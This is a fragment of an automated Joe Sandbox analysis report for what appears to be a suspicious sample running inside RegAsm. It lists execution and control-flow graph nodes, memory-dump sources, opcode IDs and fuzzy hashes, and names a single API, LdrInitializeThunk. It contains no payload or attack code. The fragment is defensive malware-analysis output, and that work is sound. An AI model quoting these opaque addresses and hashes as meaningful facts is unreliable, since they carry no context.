                                                                                                                                            execution_graph 9201 26f46d8 9202 26f46e4 9201->9202 9205 26f48c9 9202->9205 9206 26f48e4 9205->9206 9210 26f4ef8 9206->9210 9217 26f4f08 9206->9217 9207 26f4713 9211 26f4f2a 9210->9211 9212 26f4ff6 9211->9212 9224 26fc387 9211->9224 9230 26fc158 9211->9230 9236 26fc168 9211->9236 9240 26fc76c 9211->9240 9212->9207 9218 26f4f2a 9217->9218 9219 26f4ff6 9218->9219 9220 26fc76c 2 API calls 9218->9220 9221 26fc168 LdrInitializeThunk 9218->9221 9222 26fc158 2 API calls 9218->9222 9223 26fc387 2 API calls 9218->9223 9219->9207 9220->9219 9221->9219 9222->9219 9223->9219 9226 26fc3b9 9224->9226 9225 26fc519 9225->9212 9226->9225 9227 26fc764 LdrInitializeThunk 9226->9227 9229 26fc168 LdrInitializeThunk 9226->9229 9227->9225 9229->9226 9231 26fc17a 9230->9231 9235 26fc17f 9230->9235 9231->9212 9232 26fc764 LdrInitializeThunk 9232->9231 9234 26fc168 LdrInitializeThunk 9234->9235 9235->9212 9235->9231 9235->9232 9235->9234 9237 26fc17a 9236->9237 9239 26fc17f 9236->9239 9237->9212 9238 26fc8a9 LdrInitializeThunk 9238->9237 9239->9212 9239->9237 9239->9238 9241 26fc623 9240->9241 9242 26fc764 LdrInitializeThunk 9241->9242 9245 26fc168 LdrInitializeThunk 9241->9245 9244 26fc8c1 9242->9244 9244->9212 9245->9241 9246 26fcab0 9247 26fcadd 9246->9247 9248 26fc168 LdrInitializeThunk 9247->9248 9249 26fe9bf 9247->9249 9251 26fcde6 9247->9251 9248->9251 9250 26fc168 LdrInitializeThunk 9250->9251 9251->9249 9251->9250

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1463 26fc168-26fc178 1464 26fc17f-26fc18b 1463->1464 1465 26fc17a 1463->1465 1468 26fc18d 1464->1468 1469 26fc192-26fc1a7 1464->1469 1466 26fc2ab-26fc2b5 1465->1466 1468->1466 1472 26fc1ad-26fc1b8 1469->1472 1473 26fc2bb-26fc2fb call 26f5d08 1469->1473 1476 26fc1be-26fc1c5 1472->1476 1477 26fc2b6 1472->1477 1490 26fc302-26fc378 call 26f5d08 call 26f5c00 1473->1490 1478 26fc1c7-26fc1de 1476->1478 1479 26fc1f2-26fc1fd 1476->1479 1477->1473 1489 26fc1e4-26fc1e7 1478->1489 1478->1490 1484 26fc1ff-26fc207 1479->1484 1485 26fc20a-26fc214 1479->1485 1484->1485 1493 26fc29e-26fc2a3 1485->1493 1494 26fc21a-26fc224 1485->1494 1489->1477 1495 26fc1ed-26fc1f0 1489->1495 1523 26fc3df-26fc454 call 26f5ca8 1490->1523 1524 26fc37a-26fc385 1490->1524 1493->1466 1494->1477 1501 26fc22a-26fc246 1494->1501 1495->1478 1495->1479 1506 26fc24a-26fc24d 1501->1506 1507 26fc248 1501->1507 1509 26fc24f-26fc252 1506->1509 1510 26fc254-26fc257 1506->1510 1507->1466 1512 26fc25a-26fc268 1509->1512 1510->1512 1512->1477 1516 26fc26a-26fc271 1512->1516 1516->1466 1518 26fc273-26fc279 1516->1518 1518->1477 1519 26fc27b-26fc280 1518->1519 1519->1477 1521 26fc282-26fc295 1519->1521 1521->1477 1527 26fc297-26fc29a 1521->1527 1530 26fc4f3-26fc4f9 1523->1530 1524->1523 1527->1518 1529 26fc29c 1527->1529 1529->1466 1531 26fc4ff-26fc517 1530->1531 1532 26fc459-26fc46c 1530->1532 1535 26fc52b-26fc53e 1531->1535 1536 26fc519-26fc526 1531->1536 1533 26fc46e 1532->1533 1534 26fc473-26fc4c4 1532->1534 1533->1534 1554 26fc4d7-26fc4e9 1534->1554 1555 26fc4c6-26fc4d4 1534->1555 1537 26fc545-26fc561 1535->1537 1538 26fc540 1535->1538 1539 26fc8c1-26fc9bf 1536->1539 1541 26fc568-26fc58c 1537->1541 1542 26fc563 1537->1542 1538->1537 1544 26fc9c7-26fc9d1 1539->1544 1545 26fc9c1-26fc9c6 call 26f5ca8 1539->1545 1549 26fc58e 1541->1549 1550 26fc593-26fc5c5 1541->1550 1542->1541 1545->1544 1549->1550 1559 26fc5cc-26fc60e 1550->1559 1560 26fc5c7 1550->1560 1556 26fc4eb 1554->1556 1557 26fc4f0 1554->1557 1555->1531 1556->1557 1557->1530 1562 26fc615-26fc61e 1559->1562 1563 26fc610 1559->1563 1560->1559 1564 26fc846-26fc84c 1562->1564 1563->1562 1565 26fc623-26fc648 1564->1565 1566 26fc852-26fc865 1564->1566 1569 26fc64f-26fc686 1565->1569 1570 26fc64a 1565->1570 1567 26fc86c-26fc887 1566->1567 1568 26fc867 1566->1568 1571 26fc88e-26fc8a2 1567->1571 1572 26fc889 1567->1572 1568->1567 1578 26fc68d-26fc6bf 1569->1578 1579 26fc688 1569->1579 1570->1569 1576 26fc8a9-26fc8bf LdrInitializeThunk 1571->1576 1577 26fc8a4 1571->1577 1572->1571 1576->1539 1577->1576 1581 26fc723-26fc736 1578->1581 1582 26fc6c1-26fc6e6 1578->1582 1579->1578 1583 26fc73d-26fc762 1581->1583 1584 26fc738 1581->1584 1585 26fc6ed-26fc71b 1582->1585 1586 26fc6e8 1582->1586 1589 26fc764-26fc765 1583->1589 1590 26fc771-26fc7a9 1583->1590 1584->1583 1585->1581 1586->1585 1589->1566 1591 26fc7ab 1590->1591 1592 26fc7b0-26fc811 call 26fc168 1590->1592 1591->1592 1598 26fc818-26fc83c 1592->1598 1599 26fc813 1592->1599 1602 26fc83e 1598->1602 1603 26fc843 1598->1603 1599->1598 1602->1603 1603->1564
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4146130162.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_26f0000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95ba5b2a3f35e9abcf1337482df914a144e219fdf5938e3962d772ac5e002970
                                                                                                                                            • Instruction ID: bf62a173dbf9da23e26e0280c5cb87610fd5f969a08a65de98d6a1641c7698dc
                                                                                                                                            • Opcode Fuzzy Hash: 95ba5b2a3f35e9abcf1337482df914a144e219fdf5938e3962d772ac5e002970
                                                                                                                                            • Instruction Fuzzy Hash: 39222B74E012188FDF54DFA8C894B9DBBB2BF88304F1085AAD509AB355DB359D86CF90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2307 26f4f08-26f4f28 2308 26f4f2f-26f4fc0 2307->2308 2309 26f4f2a 2307->2309 2313 26f4fc6-26f4fd6 2308->2313 2314 26f5314-26f5348 2308->2314 2309->2308 2363 26f4fd9 call 26f56af 2313->2363 2364 26f4fd9 call 26f5367 2313->2364 2317 26f4fdf-26f4fee 2365 26f4ff0 call 26fc76c 2317->2365 2366 26f4ff0 call 26fc168 2317->2366 2367 26f4ff0 call 26fc158 2317->2367 2368 26f4ff0 call 26fc387 2317->2368 2318 26f4ff6-26f5012 2320 26f5019-26f5022 2318->2320 2321 26f5014 2318->2321 2322 26f5307-26f530d 2320->2322 2321->2320 2323 26f5027-26f50a1 2322->2323 2324 26f5313 2322->2324 2329 26f515d-26f51b8 2323->2329 2330 26f50a7-26f5115 call 26f3760 2323->2330 2324->2314 2340 26f51b9-26f5209 2329->2340 2341 26f5158-26f515b 2330->2341 2342 26f5117-26f5157 2330->2342 2347 26f520f-26f52f1 2340->2347 2348 26f52f2-26f52fd 2340->2348 2341->2340 2342->2341 2347->2348 2350 26f52ff 2348->2350 2351 26f5304 2348->2351 2350->2351 2351->2322 2363->2317 2364->2317 2365->2318 2366->2318 2367->2318 2368->2318
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4146130162.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_26f0000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 76eb3d8e3b01b87d9e0200cbd57080dcea08b1e3174190cbfbe317450cc852d4
                                                                                                                                            • Instruction ID: 685a640273165327228f0fab22734b7e6a5982c326b4cb2a3486e454d213e7e8
                                                                                                                                            • Opcode Fuzzy Hash: 76eb3d8e3b01b87d9e0200cbd57080dcea08b1e3174190cbfbe317450cc852d4
                                                                                                                                            • Instruction Fuzzy Hash: 60C1C274E00218CFDB54DFA9D994B9DBBB2BF88305F1094A9D809AB364DB355E81CF11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4146130162.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_26f0000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4d54f7f6f5213f2e809bc7f4e526407a7ecfb37bb973a28a4215af6bea0cf78f
                                                                                                                                            • Instruction ID: 6e5498cbc99262920eecb41288818da0e2a88da00b917e0c61aa3643ec147fcd
                                                                                                                                            • Opcode Fuzzy Hash: 4d54f7f6f5213f2e809bc7f4e526407a7ecfb37bb973a28a4215af6bea0cf78f
                                                                                                                                            • Instruction Fuzzy Hash: 93A1F370D00208CFDB24DFA9D598BEDBBB1BF88305F208269E509AB391DB749985CF55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4146130162.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_26f0000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 81ed030559e4164642a4d1b25121d99f89c4a4eea235d043d996d4d0056f31ef
                                                                                                                                            • Instruction ID: 3a1bb8aa161cb9b1884122202cdadce650b22f6e6caf37f61e3aade1fded1398
                                                                                                                                            • Opcode Fuzzy Hash: 81ed030559e4164642a4d1b25121d99f89c4a4eea235d043d996d4d0056f31ef
                                                                                                                                            • Instruction Fuzzy Hash: 5D912270D00208CFDB50DFA8C588BACBBB1FF49305F209269E50AAB3A1DB749981CF55

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1604 26fc76c 1605 26fc82b-26fc83c 1604->1605 1606 26fc83e 1605->1606 1607 26fc843-26fc84c 1605->1607 1606->1607 1609 26fc623-26fc648 1607->1609 1610 26fc852-26fc865 1607->1610 1613 26fc64f-26fc686 1609->1613 1614 26fc64a 1609->1614 1611 26fc86c-26fc887 1610->1611 1612 26fc867 1610->1612 1615 26fc88e-26fc8a2 1611->1615 1616 26fc889 1611->1616 1612->1611 1622 26fc68d-26fc6bf 1613->1622 1623 26fc688 1613->1623 1614->1613 1620 26fc8a9-26fc8bf LdrInitializeThunk 1615->1620 1621 26fc8a4 1615->1621 1616->1615 1624 26fc8c1-26fc9bf 1620->1624 1621->1620 1629 26fc723-26fc736 1622->1629 1630 26fc6c1-26fc6e6 1622->1630 1623->1622 1627 26fc9c7-26fc9d1 1624->1627 1628 26fc9c1-26fc9c6 call 26f5ca8 1624->1628 1628->1627 1632 26fc73d-26fc762 1629->1632 1633 26fc738 1629->1633 1634 26fc6ed-26fc71b 1630->1634 1635 26fc6e8 1630->1635 1639 26fc764-26fc765 1632->1639 1640 26fc771-26fc7a9 1632->1640 1633->1632 1634->1629 1635->1634 1639->1610 1641 26fc7ab 1640->1641 1642 26fc7b0-26fc811 call 26fc168 1640->1642 1641->1642 1648 26fc818-26fc82a 1642->1648 1649 26fc813 1642->1649 1648->1605 1649->1648
                                                                                                                                            APIs
                                                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 026FC8AE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4146130162.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_26f0000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: b0a6695106e97575a5ad7782279380891e8e3c1f16d804dda7461a3dc90c13df
                                                                                                                                            • Instruction ID: 343d315ac032213b8ea1f296417dcff6df17ce056d486daa3c3b3bf4e02c203e
                                                                                                                                            • Opcode Fuzzy Hash: b0a6695106e97575a5ad7782279380891e8e3c1f16d804dda7461a3dc90c13df
                                                                                                                                            • Instruction Fuzzy Hash: F6113A74E011099FDF44DBA8D494AADBBB5FB88304F54816AE914A7345D731AD41CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4145514241.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_aed000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: db0c7c99d5efcb71030556fcccc02ed495697e633536f0a62064f21031431fb4
                                                                                                                                            • Instruction ID: 2b0d0bc6a264fc0c67d2c9b92efdfdc646213683881ade38ce2cec4aafd28f77
                                                                                                                                            • Opcode Fuzzy Hash: db0c7c99d5efcb71030556fcccc02ed495697e633536f0a62064f21031431fb4
                                                                                                                                            • Instruction Fuzzy Hash: 7F317C7550D3C49FCB03CB24D994715BF71AF46214F29C5DBD8898F2A3C23A980ACB62
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.4145514241.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_aed000_RegAsm.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 14adf74a11229b90ac73153d3e29e5cb0a56268c93256c9064a20d9a5158bbdc
                                                                                                                                            • Instruction ID: 6ba875c033431a0b0c3530e43896f46145b1cefe8b3ed0435732294e5dd0b2aa
                                                                                                                                            • Opcode Fuzzy Hash: 14adf74a11229b90ac73153d3e29e5cb0a56268c93256c9064a20d9a5158bbdc
                                                                                                                                            • Instruction Fuzzy Hash: 25210775604284DFCB15DF15D9C4B26BBA5FB84314F28CA6DD80A4B386C336D847CB61